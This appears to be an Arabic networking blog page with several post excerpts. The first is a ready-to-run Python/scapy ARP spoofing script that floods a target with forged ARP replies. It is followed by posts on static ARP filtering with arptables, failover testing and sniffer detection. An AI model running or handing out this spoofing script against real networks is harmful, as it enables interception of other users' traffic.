سكربت بسيط لعمل ARP Spoofing

سكربت بسيط لعمل ARP Spoofing … قم بنسخ الكود وتشغيله او تحميله من صفحة المشاريع (هنا) …

#!/usr/bin/env python
import sys, time
from scapy.all import sendp, ARP, Ether

if len (sys.argv) < 4:
	print "Usage\n:"
	print sys.argv[0] + "   "
	print "./arpSpoofer.py eth0 192.168.1.56 192.168.1.100"	
	sys.exit (1)

networkInterface = str(sys.argv[1])
targetIPAddr = sys.argv[2]
spoofedIPAddr = sys.argv[3]

# Assembling the Spoofed Packet
spoofedPacket = Ether() / ARP(pdst=targetIPAddr, psrc=spoofedIPAddr, op="is-at")

# Start Spoofing (aka Poisoning) :)
while True:
	sendp(spoofedPacket, iface=networkInterface)
	time.sleep (1)

المزيد من التجارب في الطريق إن شاء الله :)

طريقة فلترة حزم ARP من خلال arptables

قبل فترة كتب لنا الأخ ماجد عن عملية سرقة الإتصال من خلال سرقة المنافذ أو ما يسمى Port Stealing في موضوعه هنا

ذكر أخونا ماجد في موضوعه الـ Static ARP فقلت لما لا نشرح كيفية عملها في جنو/لينوكس ؟ :)

موضوعي هذا هو مجرد شرح لكيفية عملية تثبيت الـ ARP من خلال إستعمال ARPTables …

تعريف: arptables
هي الأداة التي من خلالها يتم التحكم بعملية فلترة حزم الـ ARP

إستعمالها بسيط جداً وليست صعبة … حيث يوجد لها جداول مثل جداول iptables تقريبا والتي هي:

IN
OUT
FORWARD

من أسمائها نعرف ما هي أهدافها … على كل حال لنقوم بعمل مثال يوضح كل شيء … لنفرض إننا نريد من جهازنا أن يتخاطب مع الـ Gateway فقط، وكان الـ Gateway له المعلومات التالية:

IP address: 10.0.0.1
MAC address: 00:AA:AA:AA:AA:AA

Continue reading

هل تختبر حلول الـ failover التي تستعملها؟

السلام عليكم ورحمة الله وبركاته

صراحة هذا السؤال ظروري جداً تجاوب عليه إن كنت تستعمل Cluster أو أي من حلول الـ Failover في بيئة عملك … الأسبوع الماضي طلبت من الفريق الذي أعمل معه التقرير الخاص بعملية الـ Failover لبيئة العمل لكي أطلع عليه وأرى آلية وخطوات عمل الـ Failover وكيف ستحدث … ولكن أنصدمت بإنهم لم يقوموا بتجربة ذلك قط !!!

عندها سألتهم من قال عندنا Failover إذن؟ أنا أقول نحن ما عندنا حاجة أصلاً … وهذه الحقيقة من لم يقم بالتجربة إذن لا يوجد لديه شيء إسمه Failover … ولهذا أتفقنا بعمل تجربة … أول تجربة كانت Failover على مستوى الـ VPN Connections والجدران النارية فقط … وكيف ستتعامل باقي الخوادم مع التغييرات التي حصلت … فقمنا بإيقاف عمل الـ Firewall الأول والـ VPN Connection الأول أي الـ Master وقمنا بتحويل كل شيء الى الـ Slave … طبعاً الـ Firewall الثاني بعدما تأكد بإن Firewall1 كان Down خلاص أخذ زمام الأمور وتحول كل الخط اليه وأصبح هو المسؤول عن تمرير الحزم من خارج والى داخل الشبكة … الى الآن جميل جداً … Continue reading

HOWTO detect a sniffer

السلام عليكم ورحمة الله وبركاته

بعدما كتبت بالسابق حول كيفية عمل Sniff من خلال إستعمال Ethernet TAP وذكرت أيضاً طرق أخرى في نفس الموضوع … أصبح السؤال الذي يدور في أذهاننا جميعاً: كيف أستطيع إكتشاف من يقوم بعمل Sniff ؟
بصراحة الجواب ليس بسيط أبداً … هناك عدة أمور وعدة عوامل ممكن تعملها لكي تستطيع أن “تشك” أو “تفترض” وجود شخص يقوم بعمل Sniff على الشبكة … أما يكون جواب جازم؟ الى الآن لم أجد سوى كم برنامج وحسب ما فهمت بإنها أصبحت Out of Date !!! منها AntiSniff …

طيب والحل؟ الحل أن نقوم بعمل عدة تجارب ممكن تعطينا تصور معيين عن الوضعية في الشبكة وممكن تجعلنا نخمن، نفترض، أو نشك بوجود شخص جالس يعمل Sniff على الشبكة … هذه التجارب سأقوم بذكرها وشرح آلية إستعمالها لعلها تكون ذات فائدة لكم إن شاء الله …

ملاحظة مهمة جداً: لكي تنجح معك هذه العمليات/التجارب التي سأقوم بذكرها عليك أن تقوم أنت بدورك بعمل Sniff أو لكي لا يزعل البعض عمل Packet Capturing على الحزم المارة بالشبكة مثلك مثل الـ Sniffer لكي ترى جميع ما يرسل بالشبكة … الرجاء لا تنسى ذلك وأكمل القراءة … Continue reading